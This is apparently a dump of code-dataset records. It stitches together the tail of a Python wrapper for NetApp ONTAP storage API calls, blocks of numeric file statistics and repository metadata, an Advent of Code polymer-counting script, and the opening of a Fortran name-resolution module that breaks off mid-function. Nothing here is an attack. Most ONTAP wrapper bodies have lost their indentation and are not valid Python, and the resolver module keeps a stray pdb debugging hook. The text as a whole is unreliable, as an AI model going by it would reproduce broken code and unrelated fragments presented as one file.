api_call = _invoke_api('test-zapi-smf-mapping-apis-create', *args)
return api_call
def test_zapi_smf_mapping_apis_destroy(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-destroy', *args)
return api_call
def test_zapi_smf_mapping_apis_destroy_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-destroy-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get', *args)
return api_call
def test_zapi_smf_mapping_apis_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-create-defaults', *args)
return api_call
def test_zapi_smf_mapping_apis_get_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_get_total_records(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-get-total-records', *args)
return api_call
def test_zapi_smf_mapping_apis_list_info(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-list-info', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_async_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-async-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_async_no_query(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-async-no-query', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_create(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-create', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_default(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-default', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_default_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-default-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_method_only_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-method-only-get', *args)
return api_call
def test_zapi_smf_mapping_apis_modify(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-modify', *args)
return api_call
def test_zapi_smf_mapping_apis_modify_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-modify-iter', *args)
return api_call
def ucm_adapter_get(*args):
api_call = _invoke_api('ucm-adapter-get', *args)
return api_call
def ucm_adapter_get_iter(*args):
api_call = _invoke_api('ucm-adapter-get-iter', *args)
return api_call
def ucm_adapter_modify(*args):
api_call = _invoke_api('ucm-adapter-modify', *args)
return api_call
def unit_test_ktest_run(*args):
api_call = _invoke_api('unit-test-ktest-run', *args)
return api_call
def virtual_machine_get_info(*args):
api_call = _invoke_api('virtual-machine-get-info', *args)
return api_call
def virtual_machine_system_disks_get_iter(*args):
api_call = _invoke_api('virtual-machine-system-disks-get-iter', *args)
return api_call
def vmservices_vsphere_credential_check(*args):
api_call = _invoke_api('vmservices-vsphere-credential-check', *args)
return api_call
def vmservices_vsphere_credential_get(*args):
api_call = _invoke_api('vmservices-vsphere-credential-get', *args)
return api_call
def vmservices_vsphere_credential_modify(*args):
api_call = _invoke_api('vmservices-vsphere-credential-modify', *args)
return api_call
def volume_aggregate_vacate_async(*args):
api_call = _invoke_api('volume-aggregate-vacate-async', *args)
return api_call
def volume_autobalance_get_iter(*args):
api_call = _invoke_api('volume-autobalance-get-iter', *args)
return api_call
def volume_clone_get_iter(*args):
api_call = _invoke_api('volume-clone-get-iter', *args)
return api_call
def volume_copy_start(*args):
api_call = _invoke_api('volume-copy-start', *args)
return api_call
def volume_footprint_get_iter(*args):
api_call = _invoke_api('volume-footprint-get-iter', *args)
return api_call
def volume_get_iter(*args):
    """Invoke the 'volume-get-iter' ONTAP API and return the result element."""
    return _invoke_api('volume-get-iter', *args)
def volume_modify_iter(*args):
api_call = _invoke_api('volume-modify-iter', *args)
return api_call
def volume_modify_iter_async(*args):
api_call = _invoke_api('volume-modify-iter-async', *args)
return api_call
def volume_move_get_iter(*args):
api_call = _invoke_api('volume-move-get-iter', *args)
return api_call
def volume_move_modify(*args):
api_call = _invoke_api('volume-move-modify', *args)
return api_call
def volume_move_start(*args):
api_call = _invoke_api('volume-move-start', *args)
return api_call
def volume_move_target_aggr_get_iter(*args):
api_call = _invoke_api('volume-move-target-aggr-get-iter', *args)
return api_call
def volume_move_trigger_abort(*args):
api_call = _invoke_api('volume-move-trigger-abort', *args)
return api_call
def volume_move_trigger_cutover(*args):
api_call = _invoke_api('volume-move-trigger-cutover', *args)
return api_call
def volume_recovery_queue_get(*args):
api_call = _invoke_api('volume-recovery-queue-get', *args)
return api_call
def volume_recovery_queue_get_iter(*args):
api_call = _invoke_api('volume-recovery-queue-get-iter', *args)
return api_call
def volume_recovery_queue_modify_retention(*args):
api_call = _invoke_api('volume-recovery-queue-modify-retention', *args)
return api_call
def volume_recovery_queue_purge(*args):
api_call = _invoke_api('volume-recovery-queue-purge', *args)
return api_call
def volume_recovery_queue_recover(*args):
api_call = _invoke_api('volume-recovery-queue-recover', *args)
return api_call
def volume_rehost(*args):
api_call = _invoke_api('volume-rehost', *args)
return api_call
def volume_space_get_iter(*args):
api_call = _invoke_api('volume-space-get-iter', *args)
return api_call
def volume_storage_service_get_iter(*args):
api_call = _invoke_api('volume-storage-service-get-iter', *args)
return api_call
def volume_transition(*args):
api_call = _invoke_api('volume-transition', *args)
return api_call
def volume_transition_prepare_to_downgrade(*args):
api_call = _invoke_api('volume-transition-prepare-to-downgrade', *args)
return api_call
def volume_transition_protect(*args):
api_call = _invoke_api('volume-transition-protect', *args)
return api_call
def vscan_active_scanner_pool_get_iter(*args):
api_call = _invoke_api('vscan-active-scanner-pool-get-iter', *args)
return api_call
def vscan_connection_extended_stats_get_iter(*args):
api_call = _invoke_api('vscan-connection-extended-stats-get-iter', *args)
return api_call
def vscan_connection_status_all_get_iter(*args):
api_call = _invoke_api('vscan-connection-status-all-get-iter', *args)
return api_call
def vscan_events_get_iter(*args):
api_call = _invoke_api('vscan-events-get-iter', *args)
return api_call
def vscan_on_access_policy_get_iter(*args):
api_call = _invoke_api('vscan-on-access-policy-get-iter', *args)
return api_call
def vscan_scanner_pool_get_iter(*args):
api_call = _invoke_api('vscan-scanner-pool-get-iter', *args)
return api_call
def vscan_status_get_iter(*args):
api_call = _invoke_api('vscan-status-get-iter', *args)
return api_call
def vserver_add_aggregates(*args):
api_call = _invoke_api('vserver-add-aggregates', *args)
return api_call
def vserver_add_protocols(*args):
api_call = _invoke_api('vserver-add-protocols', *args)
return api_call
def vserver_config_diff_get(*args):
api_call = _invoke_api('vserver-config-diff-get', *args)
return api_call
def vserver_config_diff_get_iter(*args):
api_call = _invoke_api('vserver-config-diff-get-iter', *args)
return api_call
def vserver_create(*args):
    """Invoke the 'vserver-create' ONTAP API and return the result element."""
    return _invoke_api('vserver-create', *args)
def vserver_destroy(*args):
api_call = _invoke_api('vserver-destroy', *args)
return api_call
def vserver_get_iter(*args):
api_call = _invoke_api('vserver-get-iter', *args)
return api_call
def vserver_login_banner_get_iter(*args):
api_call = _invoke_api('vserver-login-banner-get-iter', *args)
return api_call
def vserver_login_banner_modify_iter(*args):
api_call = _invoke_api('vserver-login-banner-modify-iter', *args)
return api_call
def vserver_modify(*args):
api_call = _invoke_api('vserver-modify', *args)
return api_call
def vserver_modify_iter(*args):
api_call = _invoke_api('vserver-modify-iter', *args)
return api_call
def vserver_motd_get_iter(*args):
api_call = _invoke_api('vserver-motd-get-iter', *args)
return api_call
def vserver_motd_modify_iter(*args):
api_call = _invoke_api('vserver-motd-modify-iter', *args)
return api_call
def vserver_peer_accept(*args):
api_call = _invoke_api('vserver-peer-accept', *args)
return api_call
def vserver_peer_check_peer_table(*args):
api_call = _invoke_api('vserver-peer-check-peer-table', *args)
return api_call
def vserver_peer_create(*args):
api_call = _invoke_api('vserver-peer-create', *args)
return api_call
def vserver_peer_delete(*args):
api_call = _invoke_api('vserver-peer-delete', *args)
return api_call
def vserver_peer_get_iter(*args):
api_call = _invoke_api('vserver-peer-get-iter', *args)
return api_call
def vserver_peer_modify(*args):
api_call = _invoke_api('vserver-peer-modify', *args)
return api_call
def vserver_peer_reject(*args):
api_call = _invoke_api('vserver-peer-reject', *args)
return api_call
def vserver_peer_resume(*args):
api_call = _invoke_api('vserver-peer-resume', *args)
return api_call
def vserver_peer_suspend(*args):
api_call = _invoke_api('vserver-peer-suspend', *args)
return api_call
def vserver_peer_transition_create(*args):
api_call = _invoke_api('vserver-peer-transition-create', *args)
return api_call
def vserver_peer_transition_destroy(*args):
api_call = _invoke_api('vserver-peer-transition-destroy', *args)
return api_call
def vserver_peer_transition_destroy_iter(*args):
api_call = _invoke_api('vserver-peer-transition-destroy-iter', *args)
return api_call
def vserver_peer_transition_get(*args):
api_call = _invoke_api('vserver-peer-transition-get', *args)
return api_call
def vserver_peer_transition_get_iter(*args):
api_call = _invoke_api('vserver-peer-transition-get-iter', *args)
return api_call
def vserver_peer_transition_modify(*args):
api_call = _invoke_api('vserver-peer-transition-modify', *args)
return api_call
def vserver_remove_aggregates(*args):
api_call = _invoke_api('vserver-remove-aggregates', *args)
return api_call
def vserver_remove_protocols(*args):
api_call = _invoke_api('vserver-remove-protocols', *args)
return api_call
def vserver_rename(*args):
api_call = _invoke_api('vserver-rename', *args)
return api_call
def vserver_saninit(*args):
api_call = _invoke_api('vserver-saninit', *args)
return api_call
def vserver_start(*args):
api_call = _invoke_api('vserver-start', *args)
return api_call
def vserver_stop(*args):
api_call = _invoke_api('vserver-stop', *args)
return api_call
def vserver_unlock(*args):
api_call = _invoke_api('vserver-unlock', *args)
return api_call
def xml_to_dict(xml):
    """Parse the XML string *xml* into a dictionary using xmltodict."""
    parsed = xmltodict.parse(xml)
    return parsed
def normalize_unicode(result):
    '''
    Takes the dictionary @result from xml_to_dict and normalizes the
    unicode characters (top level only -- nested values pass through
    untouched).
    Returns a new dictionary whose text keys/values are NFKD-normalized
    and ASCII-encoded (non-ASCII characters dropped).
    '''
    # The original code was Python-2-only (`unicode`, `iteritems`);
    # guard both names so the function also runs on Python 3, where
    # every str is already a unicode string.
    try:
        text_type = unicode          # Python 2
    except NameError:
        text_type = str              # Python 3
    try:
        items = result.iteritems()   # Python 2 dict
    except AttributeError:
        items = result.items()       # Python 3 dict
    d = {}
    for key, value in items:
        if isinstance(key, text_type):
            key = unicodedata.normalize('NFKD', key).encode('ascii', 'ignore')
        if isinstance(value, text_type):
            value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
        d[key] = value
    return d
def apicall_to_dict(api_call):
    '''
    Takes the apicall result, renders it to its XML text form and
    transforms that into a dictionary.
    '''
    return xml_to_dict(api_call.sprintf())
def _invoke_api(*args):
    """Build an NaElement request from *args, send it over the module-level
    connection `conn`, and return the response element.

    Raises IOError when the response carries a nonzero errno.
    """
    request = NaElement(*args)
    response = conn.invoke_elem(request)
    if response.results_errno() != 0:
        raise IOError('Failed api call=%s, errno=%s, desc=%s'
                      % (args, response.results_errno(), response.sprintf()))
    return response
| 31.051721
| 105
| 0.746893
| 26,996
| 181,311
| 4.628871
| 0.028597
| 0.161666
| 0.126848
| 0.196037
| 0.977393
| 0.962252
| 0.906131
| 0.733581
| 0.446515
| 0.193772
| 0
| 0.002073
| 0.137995
| 181,311
| 5,838
| 106
| 31.05704
| 0.797468
| 0.006315
| 0
| 0.330353
| 1
| 0
| 0.208646
| 0.170805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.331499
| false
| 0.00321
| 0.00619
| 0.000229
| 0.669188
| 0.001376
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
2fd36762448234362f7ae61b16d238480b32dac4
| 1,842
|
py
|
Python
|
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
day13.py
|
jm-projects/AdventOfCode2021
|
5c6630bf6130d4a40da4bc585e86fc8f4fd89749
|
[
"MIT"
] | null | null | null |
from numpy.core.numeric import count_nonzero  # NOTE(review): unused — kept to preserve the file's import surface
import pandas as pd
import numpy as np
import re


def _polymer_score(template, rules, steps):
    """Run *steps* rounds of pair-insertion on *template* and return
    the (max - min) spread of the resulting element counts.

    Only counts of adjacent character pairs are tracked (never the full
    string), so the cost per step is bounded by the number of distinct
    pairs.  The template is padded with a '0' sentinel on both ends so
    every real character belongs to exactly two pairs; the final counts
    are therefore halved.
    """
    c_dic = dict(rules)
    # Sentinel pairs never produce an insertion.
    c_dic['0' + template[0]] = ''
    c_dic[template[-1] + '0'] = ''
    padded = '0' + template + '0'

    pair_counts = {pair: 0 for pair in c_dic}
    for i in range(len(padded) - 1):
        pair_counts[padded[i] + padded[i + 1]] += 1

    for _ in range(steps):
        updated = dict(pair_counts)
        for pair, count in pair_counts.items():
            # Sentinel-touching pairs pass through unchanged.
            if pair[0] != '0' and pair[-1] != '0':
                inserted = c_dic[pair]
                updated[pair[0] + inserted] += count
                updated[inserted + pair[1]] += count
                updated[pair] -= count
        pair_counts = updated

    # Per-character occurrences: each character is counted once per pair
    # it belongs to, i.e. exactly twice thanks to the sentinels.
    occurrences = {insertion: 0 for insertion in c_dic.values()}
    for char in padded:
        occurrences[char] = 0
    for pair, count in pair_counts.items():
        occurrences[pair[0]] += count
        occurrences[pair[1]] += count

    ordered = sorted(occurrences.values())
    # The two smallest entries are bookkeeping artifacts (the '' rule
    # value and the '0' sentinel), so index 2 is the least real count.
    return (ordered[-1] - ordered[2]) // 2


data = pd.read_csv("data/day13.csv", header=None, dtype=str, delimiter='\n')[0]
# Rule lines look like "AB -> C"; split on the whitespace-arrow-whitespace.
codes = [re.split(r"\s\S\S\s", line) for line in data.values][1:]
rules = {c[0]: c[1] for c in codes}
template = np.array(data.values)[0]

# Challenge 1
print(_polymer_score(template, rules, steps=10))

# Challenge 2
print(_polymer_score(template, rules, steps=40))
| 25.943662
| 82
| 0.555375
| 361
| 1,842
| 2.795014
| 0.155125
| 0.083251
| 0.055501
| 0.071358
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0.806739
| 0
| 0.050883
| 0.231813
| 1,842
| 71
| 83
| 25.943662
| 0.662191
| 0.012486
| 0
| 0.851852
| 0
| 0
| 0.019813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ff68c81b54e463fb09babaf10ff193d2c90f9bb
| 52,261
|
py
|
Python
|
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | null | null | null |
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | 1
|
2021-03-29T14:54:22.000Z
|
2021-03-29T14:54:51.000Z
|
fortlab/resolver/kgsearch.py
|
grnydawn/fortlab
|
524daa6dd7c99c1ca4bf6088a8ba3e1bcd096d5d
|
[
"MIT"
] | null | null | null |
"""Fortran statments and expressions supported by current KGen
Module content
---------------
"""
# kgen_search.py
from fortlab.kgutils import show_tree, logger
from fortlab.resolver.kgparse import KGGenType
import fortlab.resolver.Fortran2003 as Fortran2003
#from typedecl_statements import TypeDeclarationStatement, TypeStmt, Procedure # TEEMP
from fortlab.resolver.typedecl_statements import TypeDeclarationStatement, TypeStmt
from fortlab.resolver.block_statements import Type, TypeDecl, Function, Subroutine, Interface, execution_part, Associate
from fortlab.resolver.statements import External, Common, SpecificBinding, Enumerator
from collections import OrderedDict
#import logging
#logger = logging.getLogger('kgen')
# Resolver class lists: each res_* enumerates the statement classes that
# may declare (and therefore resolve) a name appearing in the
# corresponding syntactic role.  Search functions below pass one of
# these lists to get_name_or_defer to limit candidate resolvers.
res_default = [ TypeDeclarationStatement ]
#res_external = [ External, Procedure ] # TEMP
res_external = [ External ]
res_typedecl = [ TypeDeclarationStatement ]
res_typestmt = [ TypeStmt ]
res_derivedtype = [ Type, TypeDecl ]
res_associate = [ Associate ]
# Kind/type-spec names may come from a declaration or a derived type.
res_kind = [ TypeDeclarationStatement ] + res_derivedtype
res_typespec = [ TypeDeclarationStatement ] + res_derivedtype
res_value = ([ TypeDeclarationStatement, Function, Interface, Enumerator ] +
    res_external + res_associate)
res_subroutine = [ Subroutine, Interface ] + res_external
res_function = [ Function, Interface ] + res_external
res_subprogram = [ Subroutine, Function, Interface ] + res_external
res_common = [ Common ]
res_ptr_object = [ SpecificBinding, TypeDeclarationStatement ]
res_target = res_subprogram + res_typedecl
res_anything = res_typespec + res_subprogram + [ SpecificBinding, Common, Type, TypeDecl ]
###############################################################################
################################### COMMON ####################################
###############################################################################
class SearchException(Exception):
    """Raised when an AST node cannot be searched as requested
    (e.g. a bare Name passed where a composite node is required)."""
    pass
def f2003_search_unknowns(stmt, node, config, resolvers=None, gentype=None):
    """Identify unknowns whose declaration statement will be searched by KGen.

    Walks *node* and records names still needing resolution into
    ``stmt.unknowns`` (an OrderedDict, so discovery order is preserved).
    Dispatch is by node class name to the module-level
    ``search_<ClassName>`` handler.

    Parameters
    ----------
    stmt : F2PY parser statement object
        Specify a statement object to be searched
    node : F2PY Fortran2003 parser object
        Specify an expression object to be searched
    resolvers : A list of statement classes for resolver
        Limits the classes of resolver
    gentype : Type of state data (IN or OUT)
        Specify the type of state data

    Returns
    -------
    None

    See also
    --------
    get_name_or_defer
    get_name
    defer
    defer_names
    """
    if node is None: return

    # save in unknowns dict in stmt
    if not hasattr(stmt, 'unknowns'):
        stmt.unknowns = OrderedDict()

    # skip searching if specified on the node or its parent
    if ( hasattr(node, 'skip_search') and node.skip_search ) or \
       ( hasattr(node, 'parent') and hasattr(node.parent, 'skip_search') and node.parent.skip_search ):
        return

    clsname = node.__class__.__name__
    if clsname=='Name':
        get_name(stmt, node, resolvers, config, gentype=gentype)
        return

    itemclsname = None
    try:
        if clsname.endswith('_List'):
            for item in node.items:
                if item is None: continue
                itemclsname = item.__class__.__name__
                if itemclsname=='Name':
                    get_name(stmt, item, resolvers, config, gentype=gentype)
                else:
                    # Dispatch by explicit lookup instead of exec(); a missing
                    # handler raises KeyError and takes the same error path
                    # the exec() NameError used to.
                    globals()['search_%s' % itemclsname](stmt, item, config, gentype=gentype)
        elif clsname.startswith('End_'):
            pass
        else:
            globals()['search_%s' % clsname](stmt, node, config, gentype=gentype)
    except Exception:
        errname = clsname
        if itemclsname:
            errname = itemclsname
        errmsg = "Error: Fortran specification of %s is not supported yet."%errname
        logger.exception(errmsg)

        if config["search"]['promote_exception']:
            raise
        else:
            print('')
            print(errmsg)
            print('')
            print("'kgen.log' in output folder contains detail information of this error.")
            print("If you send the log file to 'kgen@ucar.edu', that could be very")
            print("helpful for us to support this Fortran spec. in future KGEN version.")
            print('')
            import sys
            sys.exit(-1)
def get_name_or_defer(stmt, node, resolvers, config, defer=True, gentype=None):
    """Select a name to be searched, or defer to lower level of nodes in AST.

    Parameters
    ----------
    stmt : F2PY parser statement object
        Specify a statement object to be searched
    node : F2PY Fortran2003 parser object
        Specify an expression object to be searched
    resolvers : A list of statement classes for resolver
        Limits the classes of resolver
    defer : bool
        check if to search lower level of nodes in AST.
    gentype : Type of state data (IN or OUT)
        Specify the type of state data

    Returns
    -------
    None

    See also
    --------
    f2003_search_unknowns
    get_name
    defer
    defer_names
    """
    from fortlab.kgutils import KGName, pack_innamepath, match_namepath
    from fortlab.resolver.kgparse import ResState
    from fortlab.resolver.kgintrinsics import Intrinsic_Procedures
    from fortlab.resolver.base_classes import is_except

    if node is None: return

    # uncomment below line for debug
    #print node.__class__, str(node)

    if isinstance(node, Fortran2003.Name):

        # skip if intrinsic.  A name matching an intrinsic procedure is only
        # resolved when it is shadowed usage (e.g. appears as a Part_Ref) or
        # listed in the user's except-list; 'null' is special-cased because
        # null() in pointer contexts is always the intrinsic.
        if node.string.lower() in Intrinsic_Procedures:
            excepts = config["search"]['except']
            if config["search"]['skip_intrinsic'] and not is_except(node, stmt, excepts):
                if hasattr(node, 'parent') and not isinstance(node.parent, Fortran2003.Part_Ref) and \
                    not (isinstance(node.parent, Fortran2003.Function_Reference) and node.string.lower()=='null') and \
                    not (isinstance(node.parent, Fortran2003.Specific_Binding) and node.string.lower()=='null'):
                    logger.debug('Intrinsic procedure name of "%s" is used for name resolution'% \
                        (node.string.lower()))
                    logger.debug('\tnear "%s"'% stmt.item.line)
                    logger.debug('\tin %s'% stmt.reader.id)
                else:
                    #if node.string.lower()!='null':
                    #    logger.debug('Intrinsic procedure name of "%s" is skipped from name resolution'% \
                    #        (node.string.lower()))
                    #logger.debug('\tnear "%s"'% stmt.item.line)
                    #logger.debug('\tin %s'% stmt.reader.id)
                    return
            elif not config["search"]['skip_intrinsic'] and is_except(node, stmt, excepts):
                if hasattr(node, 'parent') and not isinstance(node.parent, Fortran2003.Part_Ref) and \
                    not (isinstance(node.parent, Fortran2003.Function_Reference) and node.string.lower()=='null') and \
                    not (isinstance(node.parent, Fortran2003.Specific_Binding) and node.string.lower()=='null'):
                    #logger.debug('Intrinsic procedure name of "%s" is NOT skipped from name resolution'% \
                    #    (node.string.lower()))
                    #logger.debug('\tnear "%s"'% stmt.item.line)
                    #logger.debug('\tin %s'% stmt.reader.id)
                    pass
                else:
                    if node.string.lower()!='null':
                        logger.debug('Intrinsic procedure name of "%s" is skipped from name resolution'% \
                            (node.string.lower()))
                        logger.debug('\tnear "%s"'% stmt.item.line)
                        logger.debug('\tin %s'% stmt.reader.id)
                    return

        # skip if excluded by a user-configured namepath pattern; matching
        # names are recorded on stmt.exclude_names and marked skip_search.
        #if config.exclude.has_key('namepath') and stmt.__class__ in execution_part:
        # NOTE(review): leftover debugging hook — drops into pdb when config
        # is unexpectedly a list; consider removing.
        if isinstance(config, list): import pdb; pdb.set_trace()
        if 'namepath' in config["exclude"]:
            for pattern, actions in config["exclude"]['namepath'].items():
                name = node.string.lower()
                namepath = pack_innamepath(stmt, name)
                #logger.debug('%s and %s are being checked for exclusion'%(pattern, namepath))
                if match_namepath(pattern, namepath):
                    #logger.debug('%s and %s are mathched for exclusion'%(pattern, namepath))
                    if not hasattr(stmt, 'exclude_names'): stmt.exclude_names = OrderedDict()
                    if name in stmt.exclude_names:
                        stmt.exclude_names[name].extend(actions)
                    else:
                        stmt.exclude_names[name] = actions
                    node.skip_search = True
                    if hasattr(node, 'parent'): node.parent.skip_search = True
                    return

        # record the name as an unknown with the requested resolver classes
        ukey = KGName(pack_innamepath(stmt, node.string.lower()), node=node, stmt=stmt)
        if gentype is None: gentype = KGGenType.STATE_IN

        if resolvers is None:
            stmt.unknowns[ukey] = ResState(gentype, ukey, stmt, res_default)
        else:
            stmt.unknowns[ukey] = ResState(gentype, ukey, stmt, resolvers)
        logger.debug('%s is saved as unknown' % node.string.lower())

    elif defer:
        f2003_search_unknowns(stmt, node, config, resolvers, gentype=gentype)
def get_name(stmt, node, resolvers, config, gentype=None):
    # Convenience wrapper: record `node` itself as an unknown, never recurse.
    get_name_or_defer(stmt, node, resolvers, config, defer=False, gentype=gentype)

def defer(stmt, node, config, gentype=None):
    # Recurse into a composite node; a bare Name here indicates a caller bug.
    if isinstance(node, Fortran2003.Name):
        raise SearchException('%s can not be Name class' % str(node))
    f2003_search_unknowns(stmt, node, config, gentype=gentype)

def defer_items(stmt, node, config, gentype=None):
    # Recurse into each child item of `node`; bare Name children are not allowed.
    if hasattr(node, 'items'):
        for item in node.items:
            if isinstance(item, Fortran2003.Name):
                raise SearchException('%s can not be Name class' % str(item))
            f2003_search_unknowns(stmt, item, config, gentype=gentype)
###############################################################################
################################### SEARCH ####################################
###############################################################################
def search_Type_Declaration_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Type_Declaration_Stmt node"""
    from fortlab.kgutils import pack_innamepath, match_namepath

    # collect excluded names: entity declarations whose namepath matches a
    # user-configured exclusion pattern are recorded on stmt.exclude_names
    # before the normal recursive search below.
    if 'namepath' in config["exclude"]:
        for pattern, actions in config["exclude"]['namepath'].items():
            decls = []
            # node.items[2] is either a single Entity_Decl or a list of them
            if isinstance(node.items[2], Fortran2003.Entity_Decl):
                decls.append(node.items[2].items[0].string.lower())
            elif isinstance(node.items[2], Fortran2003.Entity_Decl_List):
                for item in node.items[2].items:
                    decls.append(item.items[0].string.lower())
            for decl in decls:
                namepath = pack_innamepath(stmt, decl)
                if match_namepath(pattern, namepath):
                    if not hasattr(stmt, 'exclude_names'): stmt.exclude_names = OrderedDict()
                    if decl in stmt.exclude_names:
                        stmt.exclude_names[decl].extend(actions)
                    else:
                        stmt.exclude_names[decl] = actions
    defer_items(stmt, node, config)
# --- Declaration/expression handlers: each resolves the relevant child
# --- items of its node class with the appropriate resolver list.
def search_Intrinsic_Type_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Intrinsic_Type_Spec node"""
    defer(stmt, node.items[1], config)

def search_Kind_Selector(stmt, node, config, gentype=None):
    """ Identifying a name in Kind_Selector node"""
    get_name_or_defer(stmt, node.items[1], res_kind, config)

def search_Entity_Decl(stmt, node, config, gentype=None):
    """ Identifying a name in Entity_Decl node"""
    defer(stmt, node.items[1], config)
    get_name_or_defer(stmt, node.items[2], res_value, config)
    get_name_or_defer(stmt, node.items[3], res_value, config)

def search_Explicit_Shape_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Explicit_Shape_Spec node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Dimension_Attr_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Dimension_Attr_Spec node"""
    defer(stmt, node.items[1], config)

def search_Add_Operand(stmt, node, config, gentype=None):
    """ Identifying a name in Add_Operand node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Mult_Operand(stmt, node, config, gentype=None):
    """ Identifying a name in Mult_Operand node"""
    get_name_or_defer(stmt, node.items[0], res_value, config)
    get_name_or_defer(stmt, node.items[2], res_value, config)

def search_Attr_Spec(stmt, node, config, gentype=None):
    """ Identifying a name in Attr_Spec node"""
    defer_items(stmt, node, config)

def search_Initialization(stmt, node, config, gentype=None):
    """ Identifying a name in Initialization node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Part_Ref(stmt, node, config, gentype=None):
    """ Identifying a name in Part_Ref node"""
    # items[0] is the array/function name (inherits caller's gentype);
    # items[1] is the subscript/argument list.
    get_name_or_defer(stmt, node.items[0], res_value, config, gentype=gentype)
    get_name_or_defer(stmt, node.items[1], res_value, config)

def search_Structure_Constructor_2(stmt, node, config, gentype=None):
    """ Identifying a name in Structure_Constructor_2 node"""
    get_name_or_defer(stmt, node.items[1], res_value, config)

# Literal constants: items[1], when present, is the kind-parameter name
# (e.g. the "dp" in 1.0_dp) and is resolved as a declared kind constant.
def search_Int_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Int_Literal_Constant node"""
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)

def search_Signed_Int_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Signed_Int_Literal_Constant node"""
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)

def search_Real_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Real_Literal_Constant node"""
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)

def search_Signed_Real_Literal_Constant(stmt, node, config, gentype=None):
    """ Identifying a name in Signed_Real_Literal_Constant node"""
    if node.items[1]:
        get_name_or_defer(stmt, Fortran2003.Name(node.items[1]), res_typedecl, config)
def search_Subroutine_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Subroutine_Stmt node"""
    get_name_or_defer(stmt, node.items[2], res_typedecl, config) # dummy args
    get_name_or_defer(stmt, node.items[3], res_typedecl, config) # postfix

def search_Comment(stmt, node, config, gentype=None):
    """ Identifying a name in Comment node"""
    # Comments normally carry no names; stmt.write_state, when present,
    # lists variables a KGen directive comment asks to resolve.
    if hasattr(stmt, 'write_state'):
        for var in stmt.write_state:
            f2003obj = Fortran2003.Variable(var)
            get_name_or_defer(stmt, f2003obj, res_typedecl, config)

def search_Nonlabel_Do_Stmt(stmt, node, config, gentype=None):
    """ Identifying a name in Nonlabel_Do_Stmt node"""
    # items layout varies: 3 items => [name, 'DO', loop_control];
    # 2 items with a str first => ['DO', loop_control].
    if len(node.items)==3:
        defer(stmt, node.items[2], config)
    elif len(node.items)==2:
        if isinstance(node.items[0], str):
            defer(stmt, node.items[1], config)

def search_Loop_Control(stmt, node, config, gentype=None):
    """ Identifying a name in Loop_Control node"""
    if len(node.items)==1:
        # while-form: single scalar-logical-expr
        get_name_or_defer(stmt, node.items[0], res_value, config)
    else:
        # do-variable is written by the loop, hence STATE_OUT
        get_name_or_defer(stmt, node.items[0], res_typedecl, config, gentype=KGGenType.STATE_OUT)
        if isinstance(node.items[1], list):
            for item in node.items[1]:
